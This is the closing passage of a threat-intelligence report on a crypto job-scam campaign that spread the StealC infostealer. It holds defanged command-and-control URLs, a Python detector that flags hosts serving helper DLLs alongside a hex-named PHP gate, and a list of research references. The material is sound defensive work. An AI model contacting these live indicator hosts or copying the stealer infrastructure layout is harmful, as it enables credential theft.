| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/nss3.dll` |
| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/vcruntime140.dll` |
| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/softokn3.dll` |
| URL | `hxxp://193[.]163[.]7[.]129/1d7bef10a75b8ff3.php` |
| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/sqlite3.dll` |
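The table shows a recognisable structure: the same host serves a fixed set of helper DLLs from one 16-hex-character directory and is also contacted on a 16-hex-character `.php` endpoint. The following Python is an added example, not part of the report, that looks for that structure in proxy logs; the log format, the client addresses and the host `198.51.100.7` (a documentation-range placeholder standing in for the host in the table) are constructed for the example, while the directory and endpoint names are the ones observed above.

```python
import re
from collections import defaultdict

# Helper DLL names from the helperFiles pattern above.
HELPER_DLLS = {
    "mozglue.dll", "msvcp140.dll", "freebl3.dll", "nss3.dll",
    "vcruntime140.dll", "softokn3.dll", "sqlite3.dll",
}

# <host>/<16 hex chars>/<name>.dll and <host>/<16 hex chars>.php, as in the table.
HELPER_RE = re.compile(
    r"^https?://(?P<host>[^/\s]+)/(?P<dir>[0-9a-f]{16})/(?P<dll>[a-z0-9]+\.dll)$")
GATE_RE = re.compile(
    r"^https?://(?P<host>[^/\s]+)/(?P<name>[0-9a-f]{16})\.php$")


def find_helper_fetch_hosts(log_lines, min_dlls=3):
    """Return {host: sorted dll names} for hosts that served at least `min_dlls`
    of the helper DLLs from a single 16-hex directory and were also contacted
    on a 16-hex .php endpoint. Each line is assumed to be
    "<timestamp> <client-ip> <url> <status>" (constructed format)."""
    dlls_by_host_dir = defaultdict(set)
    php_hosts = set()
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        url = parts[2]
        m = HELPER_RE.match(url)
        if m and m.group("dll") in HELPER_DLLS:
            dlls_by_host_dir[(m.group("host"), m.group("dir"))].add(m.group("dll"))
            continue
        g = GATE_RE.match(url)
        if g:
            php_hosts.add(g.group("host"))
    flagged = {}
    for (host, _directory), names in dlls_by_host_dir.items():
        if len(names) >= min_dlls and host in php_hosts:
            flagged[host] = sorted(names)
    return flagged


# Constructed proxy log; 198.51.100.7 is a documentation-range placeholder
# standing in for the host in the table above.
SAMPLE_PROXY_LOG = """
2024-04-14T13:31:02Z 10.0.0.5 http://198.51.100.7/3fb765dac3e38c00/sqlite3.dll 200
2024-04-14T13:31:03Z 10.0.0.5 http://198.51.100.7/3fb765dac3e38c00/nss3.dll 200
2024-04-14T13:31:03Z 10.0.0.5 http://198.51.100.7/3fb765dac3e38c00/freebl3.dll 200
2024-04-14T13:31:04Z 10.0.0.5 http://198.51.100.7/1d7bef10a75b8ff3.php 200
2024-04-14T13:31:10Z 10.0.0.9 https://cdn.example.net/3fb765dac3e38c00/sqlite3.dll 200
2024-04-14T13:31:11Z 10.0.0.9 https://www.example.net/index.php 200
""".strip().splitlines()

if __name__ == "__main__":
    print(find_helper_fetch_hosts(SAMPLE_PROXY_LOG))
```

The second client fetches a single DLL from a CDN and never touches a hex-named `.php`, so it is not flagged; requiring both halves of the pattern keeps legitimate library downloads out of the alert.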
### Execution Patterns
- Error observed after executable download on Windows 10 machines:
  - “Unable to initialize program due to missing C++ driver. Please ensure that the required driver is installed.”
User Impacts
---
- [Cryptocurrency Employment Scam Incident Report Warpcast 1](/9Lz6OPltSy-yXSpwwtFW7g)
- [Cryptocurrency Employment Scam Incident Report Warpcast 2](/rsczBuEDTFaUdSKTPB8vhg)
[^1]: [context on the art style](https://webflow.com/blog/corporate-memphis)
[^2]: [API definition and reference](https://www.ibm.com/topics/api)
[^3]: [iFrame definition and reference](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe)
References
---
**StealC**
- SEKOIA.IO. "StealC - A Copycat of Vidar and Raccoon Infostealers Gaining in Popularity Part 1." Retrieved from [https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/)
- SEKOIA.IO. "StealC - A Copycat of Vidar and Raccoon Infostealers Gaining in Popularity Part 2." Retrieved from [https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/)
**Similar Attack Vector**
- "Distributed via PDF on X." Retrieved from [https://x.com/oscarxferral/status/1752765232190251037](https://x.com/oscarxferral/status/1752765232190251037)
**DMG Samples From Security Researcher @d0wnlore**
- Initial MeetHubGG DMG sample: [https://x.com/d0wnlore/status/1767824652657967165](https://x.com/d0wnlore/status/1767824652657967165)
- Updated DMG list: [https://x.com/d0wnlore/status/1784113127094907235](https://x.com/d0wnlore/status/1784113127094907235)
**Initial Segwit Blog Executable Sample Retrieved By @w3bsecops**
- [https://twitter.com/w3bsecops](https://twitter.com/w3bsecops)
**Stealc Deployment via PDF**
- "Analysis of StealC PDF On X by Iamdeadlyz." Retrieved from [https://x.com/Iamdeadlyz/status/1754061842157293858](https://x.com/Iamdeadlyz/status/1754061842157293858)
**Stealc Distribution via Discord**
- "Distribution via Discord documented on X by ULTRAFRAUD." Retrieved from [https://x.com/ULTRAFRAUD/status/1632479744972267520](https://x.com/ULTRAFRAUD/status/1632479744972267520)
**Static Analysis**
- Glyc3rius. (2023). "Static Analysis of StealC." Retrieved from [https://glyc3rius.github.io/2023/10/stealc/](https://glyc3rius.github.io/2023/10/stealc/)
- Farghlymal. "Stealc Stealer Analysis." Retrieved from [https://farghlymal.github.io/Stealc-Stealer-Analysis/#stealc-stealer-analysis](https://farghlymal.github.io/Stealc-Stealer-Analysis/#stealc-stealer-analysis)
**Traffers**
- SEKOIA.IO. "Traffers - A Deep Dive into the Information Stealer Ecosystem." Retrieved from [https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/](https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/)
- Outpost24. "Traffers and the Growing Threat Against Credentials." Retrieved from [https://outpost24.com/blog/traffers-and-the-growing-threat-against-credentials/](https://outpost24.com/blog/traffers-and-the-growing-threat-against-credentials/)
**IOCs**
- SEKOIA.IO Community. (2023). "StealC IOCs." Retrieved from [https://github.com/SEKOIA-IO/Community/blob/main/IOCs/stealc/stealc_iocs_20230220.csv](https://github.com/SEKOIA-IO/Community/blob/main/IOCs/stealc/stealc_iocs_20230220.csv)
- VirusTotal. "ThreatFox Win StealC Collection." Retrieved from [https://www.virustotal.com/gui/collection/threatfox_win_stealc](https://www.virustotal.com/gui/collection/threatfox_win_stealc)
**North Korea Bad Actors Target Job Hunters**
- Palo Alto Networks Unit 42. "Two Campaigns by North Korea Bad Actors Target Job Hunters." Retrieved from [https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/](https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/)
- The Hacker News. "Lazarus Group Targeting Defense Experts." Retrieved from [https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html](https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html)
- InfoSec Institute. "What is Operation Dream Job by Lazarus?" Retrieved from [https://www.infosecinstitute.com/resources/malware-analysis/what-is-operation-dream-job-by-lazarus/](https://www.infosecinstitute.com/resources/malware-analysis/what-is-operation-dream-job-by-lazarus/)
**Advanced Persistent Threats - North Korea**
- MITRE. "Campaign C0022." Retrieved from [https://attack.mitre.org/campaigns/C0022/](https://attack.mitre.org/campaigns/C0022/)
- CISA. "Advanced Persistent Threats - North Korea." Retrieved from [https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/north-korea](https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/north-korea)
- CISA. "Analysis Reports AR18-275A." Retrieved from [https://www.cisa.gov/news-events/analysis-reports/ar18-275a](https://www.cisa.gov/news-events/analysis-reports/ar18-275a)